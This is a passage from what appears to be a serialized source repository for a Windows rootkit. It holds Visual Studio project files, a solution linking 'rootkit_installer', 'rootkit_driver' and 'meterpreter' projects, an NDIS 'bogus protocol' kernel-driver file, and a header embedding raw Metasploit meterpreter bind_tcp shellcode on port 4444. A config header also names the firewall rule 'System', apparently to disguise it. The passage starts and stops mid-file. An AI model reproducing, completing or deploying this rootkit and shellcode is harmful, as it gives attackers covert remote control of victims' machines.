C++\"\r\n\tVersion=\"9,00\"\r\n\tName=\"meterpreter\"\r\n\tProjectGUID=\"{07D07B92-3F3F-4054-B224-E9D8324F1FAD}\"\r\n\tRootNamespace=\"meterpreter\"\r\n\tKeyword=\"Win32Proj\"\r\n\tTargetFrameworkVersion=\"196613\"\r\n\t>\r\n\t<Platforms>\r\n\t\t<Platform\r\n\t\t\tName=\"Win32\"\r\n\t\t/>\r\n\t</Platforms>\r\n\t<ToolFiles>\r\n\t</ToolFiles>\r\n\t<Configurations>\r\n\t\t<Configuration\r\n\t\t\tName=\"Debug|Win32\"\r\n\t\t\tOutputDirectory=\"$(SolutionDir)$(ConfigurationName)\"\r\n\t\t\tIntermediateDirectory=\"$(ConfigurationName)\"\r\n\t\t\tConfigurationType=\"2\"\r\n\t\t\tCharacterSet=\"2\"\r\n\t\t\t>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPreBuildEventTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCCustomBuildTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCXMLDataGeneratorTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCWebServiceProxyGeneratorTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCMIDLTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCCLCompilerTool\"\r\n\t\t\t\tAdditionalOptions=\"/D 
&quot;DBG&quot;\"\r\n\t\t\t\tOptimization=\"3\"\r\n\t\t\t\tPreprocessorDefinitions=\"WIN32;_DEBUG;_WINDOWS;_USRDLL;METERPRETER_EXPORTS\"\r\n\t\t\t\tMinimalRebuild=\"true\"\r\n\t\t\t\tBasicRuntimeChecks=\"0\"\r\n\t\t\t\tRuntimeLibrary=\"0\"\r\n\t\t\t\tBufferSecurityCheck=\"false\"\r\n\t\t\t\tUsePrecompiledHeader=\"2\"\r\n\t\t\t\tWarningLevel=\"3\"\r\n\t\t\t\tDebugInformationFormat=\"3\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCManagedResourceCompilerTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCResourceCompilerTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPreLinkEventTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCLinkerTool\"\r\n\t\t\t\tAdditionalOptions=\"/DEF:meterpreter.def\"\r\n\t\t\t\tOutputFile=\"$(OutDir)\\..\\$(ProjectName)_debug.dll\"\r\n\t\t\t\tLinkIncremental=\"1\"\r\n\t\t\t\tGenerateManifest=\"false\"\r\n\t\t\t\tGenerateDebugInformation=\"true\"\r\n\t\t\t\tSubSystem=\"2\"\r\n\t\t\t\tTargetMachine=\"1\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCALinkTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCManifestTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCXDCMakeTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCBscMakeTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCFxCopTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCAppVerifierTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPostBuildEventTool\"\r\n\t\t\t\tCommandLine=\"post_build.bat\"\r\n\t\t\t/>\r\n\t\t</Configuration>\r\n\t\t<Configuration\r\n\t\t\tName=\"Release|Win32\"\r\n\t\t\tOutputDirectory=\"$(SolutionDir)$(ConfigurationName)\"\r\n\t\t\tIntermediateDirectory=\"$(ConfigurationName)\"\r\n\t\t\tConfigurationType=\"2\"\r\n\t\t\tCharacterSet=\"1\"\r\n\t\t\tWholeProgramOptimization=\"1\"\r\n\t\t\t>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPreBuildEventTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCCustomBuildTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCXMLDataGeneratorTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCWebServi
ceProxyGeneratorTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCMIDLTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCCLCompilerTool\"\r\n\t\t\t\tOptimization=\"2\"\r\n\t\t\t\tEnableIntrinsicFunctions=\"true\"\r\n\t\t\t\tPreprocessorDefinitions=\"WIN32;NDEBUG;_WINDOWS;_USRDLL;METERPRETER_EXPORTS\"\r\n\t\t\t\tRuntimeLibrary=\"2\"\r\n\t\t\t\tEnableFunctionLevelLinking=\"true\"\r\n\t\t\t\tUsePrecompiledHeader=\"2\"\r\n\t\t\t\tWarningLevel=\"3\"\r\n\t\t\t\tDebugInformationFormat=\"3\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCManagedResourceCompilerTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCResourceCompilerTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPreLinkEventTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCLinkerTool\"\r\n\t\t\t\tLinkIncremental=\"1\"\r\n\t\t\t\tGenerateDebugInformation=\"true\"\r\n\t\t\t\tSubSystem=\"2\"\r\n\t\t\t\tOptimizeReferences=\"2\"\r\n\t\t\t\tEnableCOMDATFolding=\"2\"\r\n\t\t\t\tTargetMachine=\"1\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCALinkTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCManifestTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCXDCMakeTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCBscMakeTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCFxCopTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCAppVerifierTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPostBuildEventTool\"\r\n\t\t\t/>\r\n\t\t</Configuration>\r\n\t</Configurations>\r\n\t<References>\r\n\t</References>\r\n\t<Files>\r\n\t\t<Filter\r\n\t\t\tName=\"Source 
Files\"\r\n\t\t\tFilter=\"cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx\"\r\n\t\t\tUniqueIdentifier=\"{4FC737F1-C7A5-4376-A066-2A32D752A2FF}\"\r\n\t\t\t>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\"..\\common\\debug.cpp\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\dllmain.cpp\"\r\n\t\t\t\t>\r\n\t\t\t\t<FileConfiguration\r\n\t\t\t\t\tName=\"Debug|Win32\"\r\n\t\t\t\t\t>\r\n\t\t\t\t\t<Tool\r\n\t\t\t\t\t\tName=\"VCCLCompilerTool\"\r\n\t\t\t\t\t\tUsePrecompiledHeader=\"0\"\r\n\t\t\t\t\t\tCompileAsManaged=\"0\"\r\n\t\t\t\t\t/>\r\n\t\t\t\t</FileConfiguration>\r\n\t\t\t\t<FileConfiguration\r\n\t\t\t\t\tName=\"Release|Win32\"\r\n\t\t\t\t\t>\r\n\t\t\t\t\t<Tool\r\n\t\t\t\t\t\tName=\"VCCLCompilerTool\"\r\n\t\t\t\t\t\tUsePrecompiledHeader=\"0\"\r\n\t\t\t\t\t\tCompileAsManaged=\"0\"\r\n\t\t\t\t\t/>\r\n\t\t\t\t</FileConfiguration>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\meterpreter.cpp\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\stdafx.cpp\"\r\n\t\t\t\t>\r\n\t\t\t\t<FileConfiguration\r\n\t\t\t\t\tName=\"Debug|Win32\"\r\n\t\t\t\t\t>\r\n\t\t\t\t\t<Tool\r\n\t\t\t\t\t\tName=\"VCCLCompilerTool\"\r\n\t\t\t\t\t\tUsePrecompiledHeader=\"1\"\r\n\t\t\t\t\t/>\r\n\t\t\t\t</FileConfiguration>\r\n\t\t\t\t<FileConfiguration\r\n\t\t\t\t\tName=\"Release|Win32\"\r\n\t\t\t\t\t>\r\n\t\t\t\t\t<Tool\r\n\t\t\t\t\t\tName=\"VCCLCompilerTool\"\r\n\t\t\t\t\t\tUsePrecompiledHeader=\"1\"\r\n\t\t\t\t\t/>\r\n\t\t\t\t</FileConfiguration>\r\n\t\t\t</File>\r\n\t\t</Filter>\r\n\t\t<Filter\r\n\t\t\tName=\"Header 
Files\"\r\n\t\t\tFilter=\"h;hpp;hxx;hm;inl;inc;xsd\"\r\n\t\t\tUniqueIdentifier=\"{93995380-89BD-4b04-88EB-625FBE52EBFB}\"\r\n\t\t\t>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\"..\\common\\debug.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\stdafx.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\targetver.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t</Filter>\r\n\t\t<Filter\r\n\t\t\tName=\"Resource Files\"\r\n\t\t\tFilter=\"rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav\"\r\n\t\t\tUniqueIdentifier=\"{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\"\r\n\t\t\t>\r\n\t\t</Filter>\r\n\t</Files>\r\n\t<Globals>\r\n\t</Globals>\r\n</VisualStudioProject>\r\n"
  },
  {
    "path": "src/meterpreter/post_build.bat",
    "content": "@echo off\r\nif exist ..\\meterpreter_debug.dll ..\\bin2c.exe ..\\meterpreter_debug.dll dll > ..\\includes\\meterpreter_debug.dll.h\r\nif exist ..\\meterpreter.dll ..\\bin2c.exe ..\\meterpreter.dll dll > ..\\includes\\meterpreter.dll.h\r\npause"
  },
  {
    "path": "src/meterpreter/stdafx.cpp",
    "content": "// stdafx.cpp : source file that includes just the standard includes\r\n// meterpreter.pch will be the pre-compiled header\r\n// stdafx.obj will contain the pre-compiled type information\r\n\r\n#include \"stdafx.h\"\r\n\r\n// TODO: reference any additional headers you need in STDAFX.H\r\n// and not in this file\r\n"
  },
  {
    "path": "src/meterpreter/stdafx.h",
    "content": "#pragma once\r\n\r\n#include \"targetver.h\"\r\n\r\n#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers\r\n\r\n#include <windows.h>\r\n\r\n#include \"../common/debug.h\"\r\n"
  },
  {
    "path": "src/meterpreter/targetver.h",
    "content": "#pragma once\r\n\r\n// The following macros define the minimum required platform.  The minimum required platform\r\n// is the earliest version of Windows, Internet Explorer etc. that has the necessary features to run \r\n// your application.  The macros work by enabling all features available on platform versions up to and \r\n// including the version specified.\r\n\r\n// Modify the following defines if you have to target a platform prior to the ones specified below.\r\n// Refer to MSDN for the latest info on corresponding values for different platforms.\r\n#ifndef WINVER                          // Specifies that the minimum required platform is Windows Vista.\r\n#define WINVER 0x0600           // Change this to the appropriate value to target other versions of Windows.\r\n#endif\r\n\r\n#ifndef _WIN32_WINNT            // Specifies that the minimum required platform is Windows Vista.\r\n#define _WIN32_WINNT 0x0600     // Change this to the appropriate value to target other versions of Windows.\r\n#endif\r\n\r\n#ifndef _WIN32_WINDOWS          // Specifies that the minimum required platform is Windows 98.\r\n#define _WIN32_WINDOWS 0x0410 // Change this to the appropriate value to target Windows Me or later.\r\n#endif\r\n\r\n#ifndef _WIN32_IE                       // Specifies that the minimum required platform is Internet Explorer 7.0.\r\n#define _WIN32_IE 0x0700        // Change this to the appropriate value to target other versions of IE.\r\n#endif\r\n"
  },
  {
    "path": "src/meterpreter_bind_tcp.h",
    "content": "/*\n * windows/meterpreter/bind_tcp - 298 bytes (stage 1)\n * http://www.metasploit.com\n * VERBOSE=false, LPORT=4444, RHOST=, EXITFUNC=thread, \n * AutoLoadStdapi=true, InitialAutoRunScript=, AutoRunScript=, \n * AutoSystemInfo=true, EnableUnicodeEncoding=true\n */\nunsigned char bind_tcp_stage_1[] = \n\"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\"\n\"\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\"\n\"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\"\n\"\\xf0\\x52\\x57\\x8b\\x52\\x10\\x8b\\x42\\x3c\\x01\\xd0\\x8b\\x40\\x78\\x85\"\n\"\\xc0\\x74\\x4a\\x01\\xd0\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20\\x01\\xd3\\xe3\"\n\"\\x3c\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\x31\\xc0\\xac\\xc1\\xcf\\x0d\"\n\"\\x01\\xc7\\x38\\xe0\\x75\\xf4\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe2\\x58\"\n\"\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\"\n\"\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\"\n\"\\xe0\\x58\\x5f\\x5a\\x8b\\x12\\xeb\\x86\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\"\n\"\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\\x90\\x01\"\n\"\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\\xff\\xd5\\x50\\x50\"\n\"\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x31\"\n\"\\xdb\\x53\\x68\\x02\\x00\\x11\\x5c\\x89\\xe6\\x6a\\x10\\x56\\x57\\x68\\xc2\"\n\"\\xdb\\x37\\x67\\xff\\xd5\\x53\\x57\\x68\\xb7\\xe9\\x38\\xff\\xff\\xd5\\x53\"\n\"\\x53\\x57\\x68\\x74\\xec\\x3b\\xe1\\xff\\xd5\\x57\\x97\\x68\\x75\\x6e\\x4d\"\n\"\\x61\\xff\\xd5\\x6a\\x00\\x6a\\x04\\x56\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\"\n\"\\xd5\\x8b\\x36\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x56\\x6a\\x00\\x68\\x58\"\n\"\\xa4\\x53\\xe5\\xff\\xd5\\x93\\x53\\x6a\\x00\\x56\\x53\\x57\\x68\\x02\\xd9\"\n\"\\xc8\\x5f\\xff\\xd5\\x01\\xc3\\x29\\xc6\\x85\\xf6\\x75\\xec\\xc3\";\n"
  },
  {
    "path": "src/meterpreter_config.h",
    "content": "\r\n/**\r\n * Payload that should be used to build the DLL for injection \r\n * into the user-mode process.\r\n */\r\n#include \"meterpreter_bind_tcp.h\"\r\n\r\n#define PAYLOAD bind_tcp_stage_1\r\n\r\n#define LISTEN_PORT 4444\r\n\r\n#define FIREWALL_RULE_NAME \"System\"\r\n"
  },
  {
    "path": "src/rootkit.sln",
    "content": "﻿\r\nMicrosoft Visual Studio Solution File, Format Version 10.00\r\n# Visual Studio 2008\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"rootkit_installer\", \"rootkit_installer\\rootkit_installer.vcproj\", \"{8A5187B5-EA41-4C34-8D5B-4213A281AAFB}\"\r\n\tProjectSection(ProjectDependencies) = postProject\r\n\t\t{3EEAAF60-1BCB-4114-8B75-168421CD9253} = {3EEAAF60-1BCB-4114-8B75-168421CD9253}\r\n\tEndProjectSection\r\nEndProject\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"rootkit_driver\", \"rootkit_driver\\rootkit_driver.vcproj\", \"{3EEAAF60-1BCB-4114-8B75-168421CD9253}\"\r\n\tProjectSection(ProjectDependencies) = postProject\r\n\t\t{07D07B92-3F3F-4054-B224-E9D8324F1FAD} = {07D07B92-3F3F-4054-B224-E9D8324F1FAD}\r\n\tEndProjectSection\r\nEndProject\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"meterpreter\", \"meterpreter\\meterpreter.vcproj\", \"{07D07B92-3F3F-4054-B224-E9D8324F1FAD}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|Win32 = Debug|Win32\r\n\t\tRelease|Win32 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{8A5187B5-EA41-4C34-8D5B-4213A281AAFB}.Debug|Win32.ActiveCfg = Debug|Win32\r\n\t\t{8A5187B5-EA41-4C34-8D5B-4213A281AAFB}.Debug|Win32.Build.0 = Debug|Win32\r\n\t\t{8A5187B5-EA41-4C34-8D5B-4213A281AAFB}.Release|Win32.ActiveCfg = Release|Win32\r\n\t\t{8A5187B5-EA41-4C34-8D5B-4213A281AAFB}.Release|Win32.Build.0 = Release|Win32\r\n\t\t{3EEAAF60-1BCB-4114-8B75-168421CD9253}.Debug|Win32.ActiveCfg = Debug|Win32\r\n\t\t{3EEAAF60-1BCB-4114-8B75-168421CD9253}.Debug|Win32.Build.0 = Debug|Win32\r\n\t\t{3EEAAF60-1BCB-4114-8B75-168421CD9253}.Release|Win32.ActiveCfg = Release|Win32\r\n\t\t{3EEAAF60-1BCB-4114-8B75-168421CD9253}.Release|Win32.Build.0 = Release|Win32\r\n\t\t{07D07B92-3F3F-4054-B224-E9D8324F1FAD}.Debug|Win32.ActiveCfg = 
Debug|Win32\r\n\t\t{07D07B92-3F3F-4054-B224-E9D8324F1FAD}.Debug|Win32.Build.0 = Debug|Win32\r\n\t\t{07D07B92-3F3F-4054-B224-E9D8324F1FAD}.Release|Win32.ActiveCfg = Release|Win32\r\n\t\t{07D07B92-3F3F-4054-B224-E9D8324F1FAD}.Release|Win32.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\nEndGlobal\r\n"
  },
  {
    "path": "src/rootkit_driver/bogusproto.cpp",
    "content": "\r\n#include \"stdafx.h\"\r\n\r\n// NDIS version: 5.1\r\n#define NDIS51 1\r\n\r\nextern \"C\"\r\n{\r\n#include <ndis.h>\r\n}\r\n\r\nNDIS_HANDLE m_hBogusProtocol = NULL;\r\n//--------------------------------------------------------------------------------------\r\nVOID OnBindAdapter(\r\n    PNDIS_STATUS Status,\r\n    NDIS_HANDLE BindContext,\r\n    PNDIS_STRING DeviceNAme,\r\n    PVOID SystemSpecific1,\r\n    PVOID SystemSpecific2)\r\n{\r\n    /*\r\n        This function is a required driver function to support Plug and Play.\r\n    */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n    DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnOpenAdapterComplete(\r\n    NDIS_HANDLE ProtocolBindingContext,\r\n    NDIS_STATUS Status,\r\n    NDIS_STATUS OpenErrorStatus)\r\n{\r\n    /*\r\n        This function is a required driver function that completes processing of a binding \r\n        operation for which NdisOpenAdapter returned NDIS_STATUS_PENDING.\r\n    */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n    DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnUnbindAdapter(\r\n    PNDIS_STATUS Status,\r\n    NDIS_HANDLE ProtocolBindingContext,\r\n    NDIS_HANDLE UnbindContext)\r\n{\r\n    /*\r\n        This function is a required function to support Plug and Play.\r\n    */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n    DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnUnload(VOID)\r\n{\r\n#ifdef DBG_NDIS_PROT\r\n\r\n    DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnCloseAdapterComplete(\r\n    NDIS_HANDLE ProtocolBindingContext,\r\n    NDIS_STATUS 
Status)\r\n{\r\n    /*\r\n        This function is a required driver function that completes processing for an unbinding \r\n        operation for which NdisCloseAdapter returned NDIS_STATUS_PENDING.\r\n    */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n    DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnResetComplete(\r\n    NDIS_HANDLE ProtocolBindingContext,\r\n    NDIS_STATUS Status)\r\n{\r\n    /*\r\n        This function is a required driver function that completes a protocol-initiated reset \r\n        operation for which NdisReset returned NDIS_STATUS_PENDING.\r\n    */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n    DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnRequestComplete(\r\n    NDIS_HANDLE ProtocolBindingContext,\r\n    PNDIS_REQUEST NdisRequest,\r\n    NDIS_STATUS Status)\r\n{\r\n    /*\r\n        This function is a required driver function that completes the processing of a \r\n        protocol-initiated query or set for which NdisRequest returned NDIS_STATUS_PENDING.\r\n    */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n    DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnStatus(\r\n    NDIS_HANDLE ProtocolBindingContext,\r\n    NDIS_STATUS GeneralStatus,\r\n    PVOID StatusBuffer,\r\n    UINT StatusBufferSize)\r\n{\r\n    /*\r\n        This function is a required driver function that handles status-change notifications \r\n        raised by an underlying connectionless network adapter driver or by NDIS.\r\n    */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n    DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnStatusComplete(NDIS_HANDLE 
ProtocolBindingContext)\r\n{\r\n    /*\r\n        This function is a required driver function that completes a status-change operation \r\n        initiated when the underlying driver called NdisMIndicateStatus.\r\n    */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n    DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnSendComplete(\r\n    NDIS_HANDLE ProtocolBindingContext,\r\n    PNDIS_PACKET Packet,\r\n    NDIS_STATUS Status)\r\n{\r\n    /*\r\n        This function is a required driver function that completes the processing of a \r\n        protocol-initiated send previously passed to NdisSendPackets or NdisSend, which \r\n        returned NDIS_STATUS_PENDING.\r\n    */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n    DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}       \r\n//--------------------------------------------------------------------------------------\r\nVOID OnTransferDataComplete(\r\n    NDIS_HANDLE ProtocolBindingContext,\r\n    PNDIS_PACKET Packet,\r\n    NDIS_STATUS Status,\r\n    UINT BytesTransferred)\r\n{\r\n    /*\r\n        This function is a required driver function if the protocol might bind itself to an \r\n        underlying connectionless network adapter driver that does not indicate full-packet \r\n        receives with NdisMIndicateReceivePacket. 
ProtocolTransferDataComplete completes the \r\n        processing of a protocol-initiated transfer-data request for which NdisTransferData \r\n        returned NDIS_STATUS_PENDING.\r\n    */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n    DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nNDIS_STATUS OnReceive(\r\n    NDIS_HANDLE ProtocolBindingContext,\r\n    NDIS_HANDLE MacReceiveContext,\r\n    PVOID HeaderBuffer,\r\n    UINT HeaderBufferSize,\r\n    PVOID LookAheadBuffer,\r\n    UINT LookAheadBufferSize,\r\n    UINT PacketSize)\r\n{\r\n    /*\r\n        This function is a required driver function in NDIS protocols that bind themselves \r\n        to connectionless network adapter drivers. ProtocolReceive determines whether a received \r\n        network packet is of interest to the protocol's clients and, if so, copies the indicated \r\n        data and, possibly, calls NdisTransferData to retrieve the rest of the indicated packet.\r\n    */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n    DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n\r\n    return STATUS_SUCCESS;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID OnReceiveComplete(NDIS_HANDLE ProtocolBindingContext)\r\n{\r\n    /*\r\n        This function is a required driver function in any protocol. 
ProtocolReceiveComplete \r\n        completes post-processing of one or more preceding receive indications from a network \r\n        adapter driver.\r\n    */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n    DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n}\r\n//--------------------------------------------------------------------------------------\r\nINT OnReceivePacket(\r\n    NDIS_HANDLE ProtocolBindingContext,\r\n    PNDIS_PACKET Packet)\r\n{\r\n    /*\r\n        ProtocolReceivePacket is an optional driver function that processes receive indications \r\n        made by underlying connectionless NIC driver(s) that call either NdisMIndicateReceivePacket \r\n        with packet arrays because the underlying driver supports multipacket receive indications \r\n        or with individual packets that have associated out-of-band information. A call to \r\n        ProtocolReceivePacket can also occur as a result of loopback.\r\n    */\r\n\r\n#ifdef DBG_NDIS_PROT\r\n\r\n    DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n\r\n    return STATUS_SUCCESS;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nNDIS_STATUS OnPnPHandler(\r\n    NDIS_HANDLE ProtocolBindingContext,\r\n    PNET_PNP_EVENT pNetPnPEvent)\r\n{\r\n#ifdef DBG_NDIS_PROT\r\n\r\n    DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n    \r\n    return STATUS_SUCCESS;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nNDIS_STATUS OnPnPNetEventReconfigure(\r\n    ULONG pAdapt,\r\n    PNET_PNP_EVENT pNetPnPEvent)\r\n{\r\n#ifdef DBG_NDIS_PROT\r\n\r\n    DbgMsg(__FUNCTION__\"() called\\n\");\r\n\r\n#endif\r\n    \r\n    return STATUS_SUCCESS;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nNDIS_STATUS OnPnPNetEventSetPower(\r\n    ULONG pAdapt,\r\n    PNET_PNP_EVENT pNetPnPEvent)\r\n{\r\n#ifdef DBG_NDIS_PROT\r\n\r\n    DbgMsg(__FUNCTION__\"() 
called\\n\");\r\n    \r\n#endif\r\n\r\n    return STATUS_SUCCESS;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nNDIS_HANDLE BogusProtocolRegister(void)\r\n{\r\n    if (m_hBogusProtocol)\r\n    {\r\n#ifdef DBG_NDIS_PROT\r\n\r\n        // protocol is allready registered\r\n        DbgMsg(__FUNCTION__\"(): Protocol is allready registered\\n\");\r\n\r\n#endif\r\n        return m_hBogusProtocol;\r\n    }\r\n\r\n    NDIS_STATUS status = STATUS_SUCCESS;    \r\n    NDIS_PROTOCOL_CHARACTERISTICS Protocol;    \r\n\r\n    // fill protocol characteristics structure\r\n    NdisZeroMemory(&Protocol, sizeof(Protocol));\r\n    Protocol.Ndis40Chars.MajorNdisVersion = 0x05;\r\n    Protocol.Ndis40Chars.MinorNdisVersion = 0x0;\r\n\r\n    Protocol.Ndis40Chars.OpenAdapterCompleteHandler = OnOpenAdapterComplete;\r\n    Protocol.Ndis40Chars.CloseAdapterCompleteHandler = OnCloseAdapterComplete;\r\n    Protocol.Ndis40Chars.SendCompleteHandler = OnSendComplete;\r\n    Protocol.Ndis40Chars.TransferDataCompleteHandler = OnTransferDataComplete;\r\n    Protocol.Ndis40Chars.ResetCompleteHandler = OnResetComplete;\r\n    Protocol.Ndis40Chars.RequestCompleteHandler = OnRequestComplete;\r\n    Protocol.Ndis40Chars.ReceiveHandler = OnReceive;\r\n    Protocol.Ndis40Chars.ReceiveCompleteHandler = OnReceiveComplete;\r\n    Protocol.Ndis40Chars.StatusHandler = OnStatus;\r\n    Protocol.Ndis40Chars.StatusCompleteHandler = OnStatusComplete;\r\n    Protocol.Ndis40Chars.BindAdapterHandler = OnBindAdapter;\r\n    Protocol.Ndis40Chars.UnbindAdapterHandler = 